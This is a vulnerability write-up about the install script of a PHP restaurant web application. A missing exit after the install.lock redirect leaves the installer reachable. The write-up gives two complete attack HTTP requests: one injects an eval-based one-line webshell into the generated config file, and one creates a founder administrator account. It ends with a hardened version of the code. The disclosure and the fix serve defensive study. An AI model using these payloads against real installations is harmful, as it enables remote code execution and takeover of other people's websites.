The problem is in the /install/index.php file. After the program finishes installing, an install.lock file is generated in the program's root directory, but /install/index.php gets the check for install.lock wrong.

    <?php
    if(file_exists("../install.lock"))
    {
        header("Location: ../"); // no exit here
    }

    //echo 'tst';exit;
    require_once("init.php");
    if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
    {

As you can see, when install.lock exists, header() only issues a 302 redirect and never exits, so the logic that follows still runs. At least two vulnerabilities arise from this.
1. getshell (very dangerous)

    if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
    {
        $smarty->assign("step",1);
        $smarty->display("index.html");
    }elseif($_REQUEST['step']==2)
    {
        $mysql_host=trim($_POST['mysql_host']);
        $mysql_user=trim($_POST['mysql_user']);
        $mysql_pwd=trim($_POST['mysql_pwd']);
        $mysql_db=trim($_POST['mysql_db']);
        $tblpre=trim($_POST['tblpre']);
        $domain==trim($_POST['domain']);
        $str="<?php \r\n";
        $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
        $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
        $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
        $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
        $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
        $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
        $str.='define("DOMAIN","'.$domain.'");'."\r\n";
        $str.='define("SKINS","default");'."\r\n";
        $str.='?>';
        file_put_contents("../config/config.inc.php",$str); // writes the submitted data into a PHP file

The code above writes the POST data straight into ../config/config.inc.php, so submitting the following POST request yields a one-line webshell:
    POST /canting/install/index.php?m=index&step=2 HTTP/1.1
    Host: 192.168.80.129
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.129/canting/install/index.php?step=1
    Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 126

    mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD

But this method is very dangerous: it will leave the site unable to run.
2. Adding an administrator directly

    elseif($_REQUEST['step']==5)
    {
        if($_POST)
        {
            require_once("../config/config.inc.php");
            $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
            mysql_select_db(MYSQL_DB,$link);
            mysql_query("SET NAMES ".MYSQL_CHARSET );
            mysql_query("SET sql_mode=''");

            $adminname=trim($_POST['adminname']);
            $pwd1=trim($_POST['pwd1']);
            $pwd2=trim($_POST['pwd2']);
            if(empty($adminname))
            {
                echo "<script>alert('管理员不能为空');history.go(-1);</script>";
                exit();
            }
            if(($pwd1!=$pwd2) or empty($pwd1))
            {
                echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // no exit here either
            }
            mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // inserts an administrator directly
        }
    }

This means we can insert an administrator account qingshen/qingshen directly; the request is as follows:
    POST /canting/install/index.php?m=index&step=5 HTTP/1.1
    Host: 192.168.80.129
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://www.2cto.com /canting/install/index.php?step=1
    Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 46

    adminname=qingshen&pwd1=qingshen&pwd2=qingshen
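For comparison, here is a hardened version of the three code paths discussed above (the lock check, the step 2 config writer and the step 5 admin insert). This is an added example written for this page, not the vendor's install/index.php; it assumes the same config path as the page and that umd5() is the project's own password-hashing helper.

```php
<?php
// Added example, not the vendor's install/index.php: the three code paths
// discussed above with the missing exits and the injection points fixed.
// Assumed: config path as on the page; umd5() is the project's own hash helper.

// Lock check: header() alone does not stop the script; exit does.
if (file_exists(__DIR__ . '/../install.lock')) {
    header('Location: ../');
    exit;
}

// Step 2: emit config.inc.php from escaped PHP literals instead of splicing
// raw POST values into source. var_export() turns  test");@eval(...);?>
// into an inert single-quoted string, so it can no longer close the define().
function buildConfig(array $in): string
{
    // TABLE_PRE is later concatenated into SQL, so restrict it to identifier characters.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $in['tblpre'] ?? '')) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $values = [
        'MYSQL_HOST' => $in['mysql_host'] ?? '', 'MYSQL_USER' => $in['mysql_user'] ?? '',
        'MYSQL_PWD'  => $in['mysql_pwd'] ?? '',  'MYSQL_DB'   => $in['mysql_db'] ?? '',
        'TABLE_PRE'  => $in['tblpre'],           'DOMAIN'     => $in['domain'] ?? '',
        'MYSQL_CHARSET' => 'GBK',                'SKINS'      => 'default',
    ];
    $src = "<?php\n";
    foreach ($values as $name => $val) {
        $src .= 'define(' . var_export($name, true) . ', '
              . var_export(trim((string) $val), true) . ");\n";
    }
    return $src;  // caller: file_put_contents('../config/config.inc.php', $src)
}

// Step 5: every validation failure terminates, and the INSERT is parameterised.
function addFounder(mysqli $db, string $name, string $pwd1, string $pwd2): void
{
    if ($name === '' || $pwd1 === '' || $pwd1 !== $pwd2) {
        echo "<script>alert('invalid admin name or password');history.go(-1);</script>";
        exit;  // the original fell through to the INSERT on a password mismatch
    }
    $hash = umd5($pwd1);
    $stmt = $db->prepare('INSERT INTO ' . TABLE_PRE
        . 'admin (adminname, password, isfounder) VALUES (?, ?, 1)');
    $stmt->bind_param('ss', $name, $hash);
    $stmt->execute();
}
```

The lock check still belongs at the top of the script, before any step handler runs; with the exit in place, neither step 2 nor step 5 is reachable once install.lock exists.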